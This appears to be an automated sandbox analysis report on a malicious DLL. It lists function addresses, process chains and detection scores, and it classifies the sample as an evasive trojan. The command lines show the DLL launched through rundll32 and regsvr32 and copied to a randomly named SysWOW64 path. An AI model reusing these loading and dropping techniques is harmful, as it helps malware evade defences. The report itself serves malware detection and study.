                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047600EF3_2_047600EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474F0E93_2_0474F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475D8DB3_2_0475D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047480C03_2_047480C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475017B3_2_0475017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475E9553_2_0475E955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047521423_2_04752142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474D14C3_2_0474D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475E1F83_2_0475E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475D1BC3_2_0475D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047421943_2_04742194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047561873_2_04756187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04760A643_2_04760A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04754A663_2_04754A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047632633_2_04763263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475B2573_2_0475B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047542443_2_04754244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04759A013_2_04759A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04757A0F3_2_04757A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475CAD53_2_0475CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04750ABA3_2_04750ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475A2A53_2_0475A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474BAA93_2_0474BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04746B7A3_2_04746B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475437A3_2_0475437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474F3693_2_0474F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047553333_2_04755333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04762B093_2_04762B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04744BFC3_2_04744BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475FBDE3_2_0475FBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474238C3_2_0474238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474FB8E3_2_0474FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2A4457_2_00C2A445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3B2577_2_00C3B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C34A667_2_00C34A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2DE747_2_00C2DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C37A0F7_2_00C37A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C420097_2_00C42009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C286367_2_00C28636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2C5D87_2_00C2C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3EFDD7_2_00C3EFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C385FF7_2_00C385FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C417BD7_2_00C417BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C321427_2_00C32142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3654A7_2_00C3654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3E9557_2_00C3E955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3FF587_2_00C3FF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2670B7_2_00C2670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3AD087_2_00C3AD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C280C07_2_00C280C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3CAD57_2_00C3CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3D8DB7_2_00C3D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3CCD97_2_00C3CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3E4E57_2_00C3E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2F0E97_2_00C2F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C400EF7_2_00C400EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C43EE97_2_00C43EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3BEFD7_2_00C3BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C21CA17_2_00C21CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3A2A57_2_00C3A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C33EAA7_2_00C33EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2BAA97_2_00C2BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C436AA7_2_00C436AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C446BD7_2_00C446BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C30ABA7_2_00C30ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2C6B87_2_00C2C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C30EBC7_2_00C30EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C274427_2_00C27442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2E6407_2_00C2E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3F8407_2_00C3F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C342447_2_00C34244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C32E5D7_2_00C32E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C40A647_2_00C40A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C432637_2_00C43263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3DC717_2_00C3DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2A8717_2_00C2A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3A4747_2_00C3A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3567B7_2_00C3567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C270787_2_00C27078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C27E797_2_00C27E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C39A017_2_00C39A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C388067_2_00C38806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2B8207_2_00C2B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C234317_2_00C23431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3C5D57_2_00C3C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2E7DE7_2_00C2E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3FBDE7_2_00C3FBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C367E67_2_00C367E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C39DF57_2_00C39DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C307F47_2_00C307F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C327F97_2_00C327F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3E1F87_2_00C3E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C255FF7_2_00C255FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C24BFC7_2_00C24BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C361877_2_00C36187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C30F867_2_00C30F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C33D857_2_00C33D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2FB8E7_2_00C2FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2238C7_2_00C2238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C221947_2_00C22194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C277A37_2_00C277A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C38FAE7_2_00C38FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C407AA7_2_00C407AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C257B87_2_00C257B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2BFBE7_2_00C2BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3D1BC7_2_00C3D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2D14C7_2_00C2D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C42D537_2_00C42D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C37D5B7_2_00C37D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2F3697_2_00C2F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C34F747_2_00C34F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C397747_2_00C39774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C26B7A7_2_00C26B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3017B7_2_00C3017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C3437A7_2_00C3437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C357797_2_00C35779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C42B097_2_00C42B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2EF0C7_2_00C2EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C355157_2_00C35515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C353337_2_00C35333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C21F387_2_00C21F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C38D3D7_2_00C38D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4EFDD11_2_04C4EFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C485FF11_2_04C485FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C380C011_2_04C380C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4CAD511_2_04C4CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4CCD911_2_04C4CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4D8DB11_2_04C4D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4E4E511_2_04C4E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3F0E911_2_04C3F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C500EF11_2_04C500EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C53EE911_2_04C53EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4BEFD11_2_04C4BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4A2A511_2_04C4A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C31CA111_2_04C31CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3BAA911_2_04C3BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C43EAA11_2_04C43EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C536AA11_2_04C536AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C546BD11_2_04C546BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C40EBC11_2_04C40EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3C6B811_2_04C3C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C40ABA11_2_04C40ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4424411_2_04C44244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3744211_2_04C37442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3E64011_2_04C3E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4F84011_2_04C4F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3A44511_2_04C3A445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4B25711_2_04C4B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C42E5D11_2_04C42E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C50A6411_2_04C50A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C44A6611_2_04C44A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C5326311_2_04C53263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4A47411_2_04C4A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3A87111_2_04C3A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4DC7111_2_04C4DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3DE7411_2_04C3DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C37E7911_2_04C37E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3707811_2_04C37078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4567B11_2_04C4567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4880611_2_04C48806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C49A0111_2_04C49A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C47A0F11_2_04C47A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C5200911_2_04C52009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3B82011_2_04C3B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3343111_2_04C33431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3863611_2_04C38636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4C5D511_2_04C4C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4FBDE11_2_04C4FBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3C5D811_2_04C3C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3E7DE11_2_04C3E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C467E611_2_04C467E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C407F411_2_04C407F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C49DF511_2_04C49DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4E1F811_2_04C4E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C355FF11_2_04C355FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C427F911_2_04C427F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C34BFC11_2_04C34BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C43D8511_2_04C43D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C40F8611_2_04C40F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4618711_2_04C46187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3FB8E11_2_04C3FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3238C11_2_04C3238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3219411_2_04C32194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C377A311_2_04C377A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C48FAE11_2_04C48FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C507AA11_2_04C507AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4D1BC11_2_04C4D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C517BD11_2_04C517BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C357B811_2_04C357B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3BFBE11_2_04C3BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4214211_2_04C42142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4654A11_2_04C4654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3D14C11_2_04C3D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4E95511_2_04C4E955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C52D5311_2_04C52D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4FF5811_2_04C4FF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C47D5B11_2_04C47D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3F36911_2_04C3F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C44F7411_2_04C44F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4977411_2_04C49774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C36B7A11_2_04C36B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4577911_2_04C45779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4437A11_2_04C4437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4017B11_2_04C4017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3670B11_2_04C3670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C52B0911_2_04C52B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4AD0811_2_04C4AD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3EF0C11_2_04C3EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4551511_2_04C45515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C4533311_2_04C45333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C48D3D11_2_04C48D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C31F3811_2_04C31F38
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10017BC1 appears 67 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001984C appears 48 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10017BC1 appears 68 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001984C appears 48 times
                      Source: xxWrY2YG7s.dllBinary or memory string: OriginalFilenameUDPTool.EXE: vs xxWrY2YG7s.dll
                      Source: xxWrY2YG7s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: xxWrY2YG7s.dllVirustotal: Detection: 35%
                      Source: xxWrY2YG7s.dllReversingLabs: Detection: 41%
                      Source: xxWrY2YG7s.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\xxWrY2YG7s.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xxWrY2YG7s.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zya",aBwRbswnSV
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6472 -ip 6472
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bcdsqhgufomb\pnioy.zya",DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 524
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6472 -ip 6472
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 512
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\xxWrY2YG7s.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xxWrY2YG7s.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zya",aBwRbswnSVJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6472 -ip 6472Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 524Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6472 -ip 6472Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 512Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bcdsqhgufomb\pnioy.zya",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER29A4.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@41/23@0/29
